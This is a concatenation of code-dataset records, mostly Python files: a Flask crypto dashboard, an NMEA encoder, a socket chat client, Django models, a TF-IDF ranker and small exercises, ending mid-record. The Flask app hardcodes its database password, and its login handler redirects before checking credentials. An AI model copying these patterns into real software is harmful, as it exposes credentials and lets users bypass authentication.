{\n \"componente\": \"ventanilla_radicado_forma\", \n \"texto\" : \"Radicación Ventanilla\",\n \"tipo\" : \"importar\"\n }\n}\n\n\nopciones = [\n radicado_web_juridico,\n\n radicado_web_natural,\n\n radicado_web_anonimo,\n\n asignar_pqrs,\n pqrs_radicado,\n\n asignar_ventanilla,\n ventanilla_radicado,\n ventanilla_radicado_consulta,\n ventanilla_radicado_gestion,\n\n #ventanilla_salida,\n #ventanilla_interno,\n\n ventanilla_interno_consulta,\n\n consulta_radicados_web,\n\n correos_grid\n]","repo_name":"quirogaco/active_document","sub_path":"aplicacion/servicios/opciones_radicacion.py","file_name":"opciones_radicacion.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39226332517","text":"from flask import Flask, flash, redirect, render_template, request, session, url_for, g\nfrom flask_session import Session\nfrom passlib.apps import custom_app_context as pwd_context\nfrom tempfile import gettempdir\nfrom helpers import *\nimport pprint # to show full html requests\n# import sqlite3 # to control transactions/rollbacks #### Deprecated, switching to MySQL ####\n#from flask_mysqldb import MySQL\nimport MySQLdb\nimport datetime # for database timestamps\nfrom cryptocompare_helpers import * # Helper functions for cryptocompare\nfrom rss_helpers import * # Helper functions for rss feeds\n###### Set up schedules ######\nimport time # Library for scheduling time based events\nimport atexit # Library for scheduling time based events\nfrom apscheduler.schedulers.background import BackgroundScheduler # Library for scheduling time based events\nfrom apscheduler.triggers.interval import IntervalTrigger # Library for scheduling time based events\nfrom app_schedules import *\n##############################\nimport logging\nlogging.basicConfig(filename='visitor.log',level=logging.WARNING) # Set to only record warnings since I don't want every request's info clogging up logs\n\nif __name__ == '__main__':\n main()\n\n# delete later #\n# configure application, instance_relative_config=True allows us to use instance folders for sensitive data\napp = Flask(__name__,instance_relative_config=True) \n#app.config.from_object('config') # Call original config file\napp.config.from_pyfile('config.py') # Call instance folder config file, this can overwrite the object variables if they are the same name\n\n# ensure responses aren't cached\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n \n# custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = gettempdir()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\n\n## OLD DB INFO ##\n# MySQL configurations\n# mysql = MySQL()\n# app.config['MYSQL_USER'] = 'blockroot'\n# app.config['MYSQL_PASSWORD'] = 'pass'\n# app.config['MYSQL_DB'] = 'Blockfund'\n# app.config['MYSQL_HOST'] = '127.0.0.1'\n# app.config['MYSQL_PORT'] = 3306\n# mysql.init_app(app)\nSession(app)\n\n# This creates a connection and tears it down after every request\n@app.teardown_appcontext\ndef close_db(error):\n # Closes the database again at the end of the request.\n if hasattr(g, 'mysql_db'):\n g.mysql_db.close()\n \ndef get_db():\n # Opens a new database connection if there is none yet for the current application context.\n if not hasattr(g, 'mysql_db'):\n g.mysql_db = MySQLdb.connect(host = '127.0.0.1', user = 'blockroot', passwd = 'pass', db = 'Blockfund', local_infile = 1)\n return g.mysql_db \n\n\n## Basic Routing Structure ##\n@app.route(\"/\")\n#@login_required\ndef index():\n log_msg = 'Index visited by IP: {}'.format(request.remote_addr)\n logging.warning(log_msg)\n print(log_msg)\n \n if request.headers.getlist(\"X-Forwarded-For\"):\n ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n ip = request.remote_addr\n print(\"IP: {}\".format(ip))\n \n \n \n # loadDashboardChartsJson()\n cursor = get_db().cursor()\n # cursor.execute(\"Select * from btcusd_instantprices order by date desc limit 1;\")\n cursor.execute(\"SELECT (@row_number:=(@row_number + 1)%2) AS newsbucket, Title, CAST(Published AS DATE), URL FROM NewsFeed,(SELECT @row_number:=0) AS t limit 20;\") # divide news articles into two bucket, limit 10 articles for each widget\n news = list(cursor.fetchall())\n\n # btc_price = results[0][2]\n return render_template('index_nwelayout.html', \n # btcprice='{:,.2f}'.format(btc_price)\n news_articles = news \n )\n\n\n@app.route(\"/email\")\n#@login_required\ndef email():\n return render_template('email.html')\n\n\n@app.route(\"/icons.html\")\n@app.route(\"/icons\")\n#@login_required\ndef icons():\n return render_template('icons.html')\n\n\n@app.route(\"/apicall\")\n#@login_required\ndef api_call():\n client = Client(app.config[\"COINBASE_API_KEY\"], app.config[\"COINBASE_API_SECRET\"])\n # client._make_api_object(client._get('v2', 'prices', 'ETH-USD', 'historic'), APIObject)\n currency_code = 'ETH' \n \n #price = client.get_spot_price(currency=currency_code)\n price = client.get_spot_price(currency_pair= \"ETH-USD\")\n print(price)\n \n\n return render_template('index.html')\n\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n log_msg = 'Login visited by IP: {}'.format(request.remote_addr)\n logging.warning(log_msg)\n print(log_msg) \n \n\n \"\"\"Log user in.\"\"\"\n # forget any user_id\n session.clear()\n\n # if user reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n print(\"HERE\")\n return redirect(url_for(\"index\"))\n # ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\")\n\n # ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\")\n\n # # query database for username\n # db = MySQLdb.connect(host = '127.0.0.1', user = 'blockroot', passwd = 'pass', db = 'Blockfund', local_infile = 1)\n # # Check if connection was successful\n # if (!db):\n # print(\"Connection unsuccessful\")\n # return -1\n # else:\n # # Terminate\n # cursor = db.cursor()\n # cursor.execute(\"Select * from Blockfund.users where username = :username\")\n # results = list(cursor.fetchall()) \n # rows = db.execute(\"SELECT * FROM users WHERE username = :username\", username=request.form.get(\"username\"))\n\n # ensure username exists and password is correct\n if len(rows) != 1 or not pwd_context.verify(request.form.get(\"password\"), rows[0][\"hash\"]):\n return apology(\"invalid username and/or password\")\n \n # remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # redirect user to home page\n return redirect(url_for(\"index\"))\n\n # else if user reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n \n \n \n \n return render_template('login.html')\n\n\n\n\n@app.route(\"/markets\")\n#@login_required\ndef markets():\n cursor = get_db().cursor()\n cursor.execute(\"SET @row_number = 0;\")\n cursor.execute(\"SELECT (@row_number := @row_number +1) AS rownum, symbol, marketcap, price, volume24hr, supply, percentchange24hr, date FROM `marketcaps` WHERE volume24hr <> 0 ORDER BY marketcap DESC LIMIT 25;\")\n results = cursor.fetchall()\n # print(results)\n\n return render_template('markets.html', \n marketcaps=results) \n \n\n@app.route(\"/invest\", methods=[\"GET\", \"POST\"])\n#@login_required\ndef invest():\n test_list = [['Individual Trade', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12'],['Portfolio Total', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12']]\n test_txn_list = [['BTC', '5900.12', '5.223', '25000.12', '2017-12-20 20:45:31'], ['BTC', '11900.12', '1.223', '25000.12', '2017-12-24 20:45:31']]\n \n \n return render_template('invest_test.html', \n portfolio_list=test_list, \n txn_list=test_txn_list, \n cash=usd(9210.11), \n total_value=usd(1117.21)\n )\n \n \n@app.route(\"/invest_test\", methods=[\"GET\", \"POST\"])\n#@login_required\ndef invest_test():\n test_list = [['Individual Trade', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12'],['Portfolio Total', 'BTC', 'Bitcoin', '5200.54', '0.01231', '200.32', '2017-12-14 20:45:31','17500.21', '998.12']]\n test_txn_list = [['BTC', '5900.12', '5.223', '25000.12', '2017-12-20 20:45:31'], ['BTC', '11900.12', '1.223', '25000.12', '2017-12-24 20:45:31']]\n \n \n return render_template('invest_test.html', \n portfolio_list=test_list, \n txn_list=test_txn_list, \n cash=usd(9210.11), \n total_value=usd(1117.21)\n ) \n \n\n@app.route(\"/education\", methods=[\"GET\"])\n#@login_required\ndef education():\n return render_template('education.html')\n\n\n\n@app.route(\"/charts\", methods=[\"GET\"])\n#@login_required\ndef charts():\n return render_template('charts.html')\n\n\n@app.route(\"/analyzer\", methods=[\"GET\"])\n#@login_required\ndef analyzer():\n cursor = get_db().cursor()\n cursor.execute(\"SELECT symbol from marketcaps;\")\n results = cursor.fetchall()\n typeahead_currency = [list(tupleresult)[0] for tupleresult in results] \n\n return render_template('analyzer2.html',\n currencynames_list = typeahead_currency\n )\n\n\n\n#***************************************************************************\n# SCHEDULED JOBS *\n#***************************************************************************\njob_defaults = {\n 'coalesce': False,\n 'max_instances': 3\n}\nscheduler = BackgroundScheduler(job_defaults=job_defaults)\nscheduler.start()\n# scheduler.add_job( \n# func=lambda: syncInstantPrices(['BTC'], ['USD']), # Must use lambda to pass function referencewith parameters otherwise function fires on app start\n# trigger='cron',\n# year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"*\", second=\"*/30\");\n \nscheduler.add_job( \n func=lambda: syncMarkets(), # Must use lambda to pass function referencewith parameters otherwise function fires on app start\n trigger='cron',\n year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"32\", second=\"5\"); \n \nscheduler.add_job( \n func=lambda: syncNews(), # Update news articles shown\n trigger='cron',\n year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"15\", second=\"5\"); \n \n \n# Shut down the scheduler when exiting the app\natexit.register(lambda: scheduler.shutdown())\n\n# Example scheduler for timed tasks\n# scheduler = BackgroundScheduler()\n# scheduler.start()\n# scheduler.add_job(\n# func=print_date_time,\n# trigger=IntervalTrigger(minutes=1),\n# id='printing_job',\n# name='Print date and time every five seconds',\n# replace_existing=True)\n \n# scheduler.add_job( ## Shit works, was just testing it\n# # Cant figure out how to pass mysql\n# # need to figure it out how to get app reference object\n# # info here: http://flask-mysqldb.readthedocs.io/en/latest/\n# func=lambda: add_daily_price_to_db('BTC'), # Must use lambda to pass function referencewith parameters otherwise function fires on app start\n# trigger='cron',\n# year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"*\", second=\"*/5\");\n# # Shut down the scheduler when exiting the app\n# atexit.register(lambda: scheduler.shutdown())\n#############################\n# scheduler.add_job( ## Shit works, was just testing it\n# # Cant figure out how to pass mysql\n# # need to figure it out how to get app reference object\n# # info here: http://flask-mysqldb.readthedocs.io/en/latest/\n# func=lambda: syncDailyPrices(), # Must use lambda to pass function referencewith parameters otherwise function fires on app start\n# trigger='cron',\n# year='*', month='*', day=\"*\", week='*', day_of_week='*', hour='*', minute=\"*/5\");\n# # Shut down the scheduler when exiting the app\n# atexit.register(lambda: scheduler.shutdown())\n############################\n\n# Example of what logging looks like:\n # logging.basicConfig(filename='visitor.log',level=logging.DEBUG)\n # logging.debug('This message should go to the log file')\n # logging.info('So should this')\n # logging.warning('And this, too')\n# What will show up in the log file:\n # DEBUG:root:This message should go to the log file\n # INFO:root:So should this\n # WARNING:root:And this, too\n \n# Logging levels of severity are \n# CRITICAL\t50\n# ERROR\t 40\n# WARNING\t30\n# INFO\t 20\n# DEBUG\t 10\n# NOTSET\t0\n\n\n\n\n\n\n","repo_name":"S-King/BF","sub_path":"Application/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":12423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4857544674","text":"# -*- coding = utf-8 -*-\n# @Time:2021/3/30 13:32\n# @Author:anonymity\n# @File:ReDemo.py\n# @Software:PyCharm\n\nimport re\n\npat = re.compile(\"AA\")\n\nm = pat.search(\"NBAAcdAA\")\nd = pat.findall(\"NBAAcdAA\")\n\nprint(d)","repo_name":"Anonymity-0/DoubanTop250","sub_path":"douban/Test/ReDemo.py","file_name":"ReDemo.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"19479814549","text":"f = open('./input.txt', 'r')\ndata = []\nfor x in f:\n data.append(int(x))\n\n# Exercise 1\nincreases = 0\nfor i in range(len(data)):\n if (data[i] > data[i - 1]):\n increases += 1\nprint(increases)\n\n# Exercise 2\nincreases = 0\nprevResult = float('inf')\nfor i in range(len(data)-2):\n result = data[i] + data[i+1] + data[i+2]\n if (result > prevResult):\n increases += 1\n prevResult = result\nprint(increases)","repo_name":"osmartti/aoc2021","sub_path":"python/day01/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"71172933356","text":"#!/usr/bin/env python\n__copyright__ = \"\"\"\n Copyright 2017 F4E | European Joint Undertaking for ITER and\n the Development of Fusion Energy ('Fusion for Energy').\n Licensed under the EUPL, Version 1.1 or - as soon they will be approved\n by the European Commission - subsequent versions of the EUPL (the \"Licence\")\n You may not use this work except in compliance with the Licence.\n You may obtain a copy of the Licence at: http://ec.europa.eu/idabc/eupl\n \n Unless required by applicable law or agreed to in writing, \n software distributed under the Licence is distributed on an \"AS IS\"\n basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n or implied. See the Licence permissions and limitations under the Licence.\n\"\"\"\n__license__ = \"EUPL\"\n__author__ = \"Andre' Neto\"\n__date__ = \"21/12/2017\"\n\n##\n# Standard imports\n##\nfrom flask import Response\nimport json\nimport logging\nimport time\nimport threading\n\n##\n# Project imports\n##\nfrom hconstants import HieratikaConstants\n\n##\n# Logger configuration\n##\nlog = logging.getLogger(\"{0}\".format(__name__))\n\n##\n# Class definition\n##\nclass WLoader(object):\n \"\"\" Provides an interface point between the specific loader implementations (see HieratikaLoader)\n and the webserver. In particular this class parses and transforms the web form parameters into \n the list of the parameters that are expected by the HieratikaLoader implementation.\n \"\"\"\n\n def __init__(self):\n \"\"\" NOOP\n \"\"\"\n self.loaderImpls = []\n\n def setLoaders(self, loaderImpls, baseDir):\n \"\"\" Sets the HieratikaLoader implementations to be used.\n \n Args:\n loaderImpls ([HieratikaLoader]): the list of HieratikaLoader implementations to be used.\n \"\"\"\n self.baseDir = baseDir\n self.loaderImpls = loaderImpls\n\n def loadIntoPlant(self, request):\n \"\"\" Parses the web parameters and loads (in order) the specified plants.\n\n Args:\n request.form[\"pageNames\"]: the name of the configuration models that are to be loaded.\n Returns:\n HieratikaConstants.OK if all the configurations are successfully loaded.\n \"\"\"\n toReturn = \"InvalidParameters\"\n try:\n projectName = request.form[\"projectName\"]\n fileName = request.form[\"fileName\"]\n userName = request.form[\"userName\"]\n projectPath = \"{0}/Projects/{1}/{2}\".format(self.baseDir, userName, projectName)\n ok = \"\"\n for loader in self.loaderImpls:\n found = loader.isLoadable(projectPath)\n if (found):\n log.info(\"Loading into the plant the page with name {0}/{1}\".format(projectPath, fileName))\n ok = loader.loadIntoPlant(projectPath, fileName)\n if (ok != \"False\"):\n log.info(\"Loaded into the plant the project with path {0}\".format(projectPath))\n else:\n log.critical(\"Failed loading into the plant the project with path {0}\".format(projectPath))\n break\n #Do not break if found\n if (not found):\n log.critical(\"Could not found a loader for the project with path {0}\".format(projectPath))\n if (ok != \"False\"):\n toReturn = ok \n except KeyError as e:\n log.critical(e)\n return toReturn\n\n","repo_name":"gferro90/MARTe2Configurator","sub_path":"server/wloader.py","file_name":"wloader.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"21728961121","text":"from functools import reduce\n# Make APB, BWR and RMB\n\nVALID_NMEA_CHARS = [chr(x) for x in range(ord('A'), ord('Z'))]\n\n\ndef nmea_name(name):\n good_name = ''\n for c in name.upper():\n if c in VALID_NMEA_CHARS:\n good_name += c\n else:\n good_name += '_'\n\n if len(good_name) > 6:\n break\n\n return good_name\n\n\ndef encode_apb(dest):\n \"\"\" https://gpsd.gitlab.io/gpsd/NMEA.html#_apb_autopilot_sentence_b \"\"\"\n nmea = '$OPAPB,'\n nmea += 'A,A,' # 1,2 Set to valid\n if dest.xte is None:\n nmea += ',,,' # 3,4,5 XTE is not valid\n else:\n dir_to_steer = 'R' if dest.xte > 0 else 'L'\n nmea += '{:.3f},{},N,'.format(dest.xte, dir_to_steer)\n nmea += 'A,' if dest.is_in_circle else 'V,' # 6 Arrival Status, A = Arrival Circle Entered. V = not entered/passed\n nmea += 'V,' # 7 Not crossed\n if dest.bod is None:\n nmea += ',M,' # 8,9 Don't have origin to destination\n else:\n nmea += '{:.1f},M,'.format(dest.bod)\n nmea += nmea_name(dest.wpt.name) + ',' if dest.wpt is not None else ',' # Waypoint name\n nmea += '{:.1f},M,'.format(dest.btw) if dest.btw is not None else ',M' # 11,12\n nmea += '{:.1f},M'.format(dest.btw) if dest.btw is not None else ',M' # 13,14 Keep the same as 11,12\n nmea = append_checksum(nmea)\n nmea += '\\r\\n'\n\n return nmea\n\n\ndef encode_bwr(instr, dest):\n \"\"\" https://gpsd.gitlab.io/gpsd/NMEA.html#_bwr_bearing_and_distance_to_waypoint_rhumb_line \"\"\"\n nmea = '$OPBWR,'\n nmea += '{:02d}{:02d}{:02d},'.format(instr.utc.hour, instr.utc.minute, instr.utc.second) # 1 UTC\n nmea += encode_coord(dest.wpt.latitude, ['N', 'S']) # 2,3 Waypoint Latitude\n nmea += encode_coord(dest.wpt.longitude, ['E', 'W']) # 4,5 Waypoint Longitude\n nmea += ',T,' # 6 Bearing, degrees True\n nmea += '{:.1f},M,'.format(dest.btw) if dest.btw is not None else ',M,' # 8,9 Bearing, degrees Magnetic\n nmea += '{:.3f},N,'.format(dest.dtw) if dest.dtw is not None else ',N,' # 10,11 Distance, Nautical Miles\n nmea += '{},'.format(nmea_name(dest.wpt.name)) # 12 Waypoint ID\n nmea += '' # 13 FAA mode indicator (NMEA 2.3 and later, optional)\n nmea = append_checksum(nmea)\n nmea += '\\r\\n'\n\n return nmea\n\n\ndef encode_rmb(dest):\n \"\"\" https://gpsd.gitlab.io/gpsd/NMEA.html#_rmb_recommended_minimum_navigation_information \"\"\"\n\n nmea = '$OPRMB,'\n nmea += 'A,' # 1 Status, A = Active, V = Invalid\n if dest.xte is None:\n nmea += ',,' # 2,3 XTE is not valid\n else:\n dir_to_steer = 'R' if dest.xte > 0 else 'L'\n nmea += '{:.3f},{},'.format(dest.xte, dir_to_steer) # 2,3\n nmea += '{},'.format(nmea_name(dest.org_wpt.name)) if dest.org_wpt is not None else \",\" # 4 Origin Waypoint ID\n nmea += '{},'.format(nmea_name(dest.wpt.name)) # 5 Destination Waypoint ID\n nmea += encode_coord(dest.wpt.latitude, ['N', 'S']) # 6,7 Destination Waypoint Latitude\n nmea += encode_coord(dest.wpt.longitude, ['E', 'W']) # 8,9 DestinationDestination Waypoint Longitude\n nmea += '{:.3f},'.format(dest.dtw) if dest.dtw is not None else ',' # 10 Range to destination in nautical miles\n nmea += '{:.1f},'.format(dest.btw_true) if dest.btw_true is not None else ',' # 11 Bearing to destination deg true\n nmea += '{:.1f},'.format(dest.stw) if dest.stw is not None else ',' # 12 Destination closing velocity in knots\n nmea += 'A,' if dest.is_in_circle else 'V,' # 13 Arrival Status, A = Arrival Circle Entered. V = not entered/passed\n nmea += '' # 14 FAA mode indicator (NMEA 2.3 and later, optional)\n\n nmea = append_checksum(nmea)\n nmea += '\\r\\n'\n\n return nmea\n\n\ndef encode_coord(coord, hemispheres):\n hemisphere = hemispheres[0] if coord > 0 else hemispheres[1]\n coord = abs(coord)\n degrees = int(coord)\n minutes = (coord - degrees) * 60.\n\n return '{}{:.5f},{},'.format(degrees, minutes, hemisphere)\n\n\ndef append_checksum(nmea):\n cc = reduce(lambda i, j: int(i) ^ int(j), [ord(x) for x in nmea[1:]]) # Exclude $ sign\n return nmea + '*{:02X}'.format(cc)\n","repo_name":"sergei/ottopi","sub_path":"navcomputer/nmea_encoder.py","file_name":"nmea_encoder.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"15947432823","text":"# -*- coding: utf-8 -*-\n\n# Définition d'un client réseau gérant en parallèle l'émission et la réception\n# des messages (utilisation de 2 threads)\n\nimport setup\nimport os\nimport socket\nimport sys\nfrom threading import Thread\n\nHOST = setup.HOST\nPORT = setup.PORT\n\nif os.name == \"nt\": # Cas Windows\n os.system(\"cls\")\nelse:\n os.system(\"clear\")\n\n\nclass ThreadReception(Thread):\n \"\"\"Objet Thread gérant la réception des messages\"\"\"\n\n def __init__(self, conn):\n Thread.__init__(self)\n self.connexion = conn # Référence du socket de connexion\n\n def run(self):\n # Boucle de réception des messages : à chaque itération, le flux\n # d'instructions s'interrompt sur self.connexion.recv, dans l'attente\n # d'un nouveau message - mais le reste du programme n'est pas figé\n # (les autres threads continuent leur travail indépendamment)\n while 1:\n message_recu = self.connexion.recv(1024).decode(\"utf-8\")\n if not message_recu or message_recu == \"FIN\":\n break\n print(\"*\" + message_recu + \"*\")\n # Le thread se termine ici.\n # print(\"Le thread réception s'est terminé correctement.\")\n print(\"Taper Enter pour quitter.\")\n # On force la fermeture du thread <émission>\n th_E.stop()\n self.connexion.close()\n\n\nclass ThreadEmission(Thread):\n \"\"\"Objet Thread gérant l'émission des messages\"\"\"\n\n def __init__(self, conn):\n Thread.__init__(self)\n self.connexion = conn # Référence du socket de connexion\n self.terminated = False\n\n def run(self):\n # Boucle d'envoi des messages : à chaque itération, le flux\n # d'instructions s'interrompt sur input(\"C> \"), dans l'attente\n # d'une entrée clavier - mais le reste du programme n'est pas figé\n # (les autres threads continuent leur travail indépendamment)\n while 1:\n message_emis = input(\"C> \")\n if self.terminated:\n break\n self.connexion.send(message_emis.encode(\"utf-8\"))\n # if message_emis == \"FIN\":\n # break\n # Le thread <émission> se termine ici.\n # print(\"Le thread émission s'est terminé correctement.\")\n # print(\"Client arrêté (Thread Emission). Connexion interrompue.\")\n sys.exit()\n\n def stop(self):\n self.terminated = True\n\n# Programme principal - Etablissement de la connexion\nconnexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnexionOK = False\nprint(PORT)\ntry:\n connexion.connect((HOST, PORT))\n connexionOK = True\nexcept socket.error:\n print(\"La connexion a échoué.\")\nif connexionOK is False:\n connexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"Nouvelle tentative en cours...\")\n PORT += 1\n print(PORT)\n try:\n connexion.connect((HOST, PORT))\n except socket.error:\n print(\"La connexion a échoué.\")\n sys.exit()\nprint(\"Connexion établie avec le serveur.\")\n\n# Dialogue avec le serveur : on instancie deux threads enfants pour gérer\n# indépendamment l'émission et la réception des messages\nth_E = ThreadEmission(connexion)\nth_R = ThreadReception(connexion)\n\nth_E.start()\nth_R.start()\n","repo_name":"NicolasMura/chat","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8464538925","text":"from collections import Counter\r\nimport sys, json, re\r\nimport math\r\n\r\ndef main():\r\n test_data = json.load(open('test.json', 'r', encoding='utf-8'))\r\n train_data = json.load(open('train.json', 'r', encoding='utf-8'))\r\n print(len(test_data))\r\n print(len(train_data))\r\n rowData = test_data + train_data\r\n # count idf\r\n idf = {}\r\n idf = Counter()\r\n for row in rowData:\r\n sentList = []\r\n for ev in row['evidence'].values():\r\n sentList += re.split(r'[?:。!().“”…\\t\\n]', ev['text'])\r\n # remove duplicates\r\n sentList = list(set(sentList))\r\n for sent in sentList:\r\n idf[sent] += 1\r\n document_count = len(rowData)\r\n for key in idf.keys():\r\n idf[key] = math.log(document_count/idf[key]+1)\r\n \r\n # count tf and select\r\n get_evidence_num = 5\r\n tdidf_ev = []\r\n for row in rowData:\r\n sentList = []\r\n for ev in row['evidence'].values():\r\n sentList += re.split(r'[?:。!().“”…\\t\\n]', ev['text'])\r\n tf = Counter()\r\n for sent in sentList:\r\n tf[sent] += 1\r\n for key in tf.keys():\r\n tf[key] = tf[key] / len(tf.keys())\r\n tf_idf = Counter()\r\n for sent in sentList:\r\n tf_idf[sent] = tf[sent] * idf[sent]\r\n tmp = list(tf_idf.items())\r\n tmp.sort(key=lambda s: s[1], reverse=True)\r\n tmp = [ele[0] for ele in tmp if len(ele[0]) > 5]\r\n tdidf_ev.append(tmp[:get_evidence_num])\r\n \r\n # with open('testTfidfSents.json', 'w', encoding='utf-8') as f:\r\n # json.dump(tdidf_ev[:len(test_data)], f, indent=2, ensure_ascii=False)\r\n # with open('trainTfidfSents.json', 'w', encoding='utf-8') as f:\r\n # json.dump(tdidf_ev[len(test_data):], f, indent=2, ensure_ascii=False)\r\n with open('tfidfSents.json', 'w', encoding='utf-8') as f:\r\n json.dump(tdidf_ev, f, indent=2, ensure_ascii=False)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"THU-BPM/CHEF","sub_path":"Pipeline/Data/Surface_Ranker.py","file_name":"Surface_Ranker.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"73"} +{"seq_id":"11100259953","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\n\n\nclass Child(models.Model):\n \"\"\"Child.\"\"\"\n\n class GENDERS:\n BOY = 'boy'\n GIRL = 'girl'\n\n CHOICES = (\n (BOY, 'Мальчик'),\n (GIRL, 'Девочка'),\n )\n\n photo = models.ImageField('Фотография', upload_to='children/%Y/%m/%d/', null=True, blank=True)\n name = models.CharField('Имя', max_length=255)\n gender = models.CharField('Пол', choices=GENDERS.CHOICES, max_length=4)\n birthdate = models.DateField('Дата рождения')\n classroom = models.SmallIntegerField('Класс', null=True, blank=True)\n is_pupil = models.BooleanField('Учится', default=False, db_index=True)\n\n class Meta:\n verbose_name = 'Ребенок'\n verbose_name_plural = 'Дети'\n\n def __str__(self):\n \"\"\"Str repr.\"\"\"\n return f'{self._meta.verbose_name} {self.name}'\n\n\nclass JournalEntry(models.Model):\n \"\"\"Journal Entry for Child.\"\"\"\n\n class PEOPLES:\n DAD = 'dad'\n MOM = 'mom'\n\n CHOICES = (\n (DAD, 'Папа'),\n (MOM, 'Мама'),\n )\n\n child = models.ForeignKey(Child, verbose_name=Child._meta.verbose_name, on_delete=models.CASCADE)\n timestamp_come = models.TimeField('Время прихода', db_index=True)\n timestamp_away = models.TimeField('Время ухода', null=True, blank=True, db_index=True)\n people_come = models.CharField('Кто привел ребенка', max_length=3, choices=PEOPLES.CHOICES)\n people_away = models.CharField('Кто забрал ребенка', max_length=3, choices=PEOPLES.CHOICES, blank=True)\n datestamp = models.DateField('Дата записи', db_index=True)\n\n class Meta:\n verbose_name = 'Запись в журнале'\n verbose_name_plural = 'Записи в журнале'\n unique_together = ('child', 'datestamp')\n\n def __str__(self):\n \"\"\"Str repr.\"\"\"\n return f'{self._meta.verbose_name} от {self.datestamp}'\n\n def clean_fields(self, exclude=None):\n \"\"\"\n Clean fields.\n\n Check when timestamp_away and people_away both equals None or both equals anything.\n\n :param exclude:\n :return:\n \"\"\"\n super().clean_fields(exclude=exclude)\n one_of_fields_filled = self.timestamp_away or self.people_away\n both_fields_filled = self.timestamp_away and self.people_away\n if one_of_fields_filled and not both_fields_filled:\n timestamp_away_verbose_name = self._meta.get_field('timestamp_away').verbose_name\n people_away_verbose_name = self._meta.get_field('people_away').verbose_name\n raise ValidationError(\n f'В отметке об уходе надо заполнить поля {timestamp_away_verbose_name} и {people_away_verbose_name}',\n )\n","repo_name":"codeleta/test_task_for_robotvera","sub_path":"creche/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74169650157","text":"'''\nchenqumi@20180815\nSpeeding Up Motif Finding\nThe failure array of s is an array P of length n for which \nP[k] is the length of the longest substring s[j:k] \nthat is equal to some prefix s[1:k−j+1], where j CANNOT equal 1 \n(otherwise, P[k] would always equal k). By convention, P[1]=0\n'''\nimport sys\n\n\nif len(sys.argv) == 1:\n print(\"\\nUsage: {} <> \".format(sys.argv[0]))\n sys.exit()\n\nfa = sys.argv[1]\n\n\ndef kmp_preprocess(s):\n j = -1\n b = [j]\n\n for i, c in enumerate(s):\n while j >= 0 and s[j] != c:\n j = b[j]\n j += 1\n b.append(j)\n\n return b[1:]\n\n\nids = ''\nfaDic = {}\nwith open(fa) as FA:\n for line in FA:\n line = line.strip()\n if line.startswith('>'):\n ids = line.split('>')[1]\n faDic[ids] = ''\n else:\n faDic[ids] += line\n\nseq = faDic[ids]\n\n\nF_array = [0] * len(seq)\nk = 0\nfor i in range(2, len(seq) + 1):\n while k > 0 and seq[k] != seq[i - 1]:\n k = F_array[k - 1]\n if seq[k] == seq[i - 1]:\n k += 1\n F_array[i - 1] = k\n\n# for i in F_array:\n# print(i, end=' ')\n# for i in kmp_preprocess(seq):\n# print(i, end=' ')","repo_name":"chenqumi/Rosalind","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2398575400","text":"from fa_purity.json_2 import (\n LegacyAdapter,\n)\nfrom fa_singer_io.singer import (\n SingerState,\n)\nfrom tap_gitlab.state import (\n EtlState,\n)\nfrom tap_gitlab.state.encoder import (\n encode_etl_state,\n)\n\n\ndef state_to_singer(state: EtlState) -> SingerState:\n encoded = 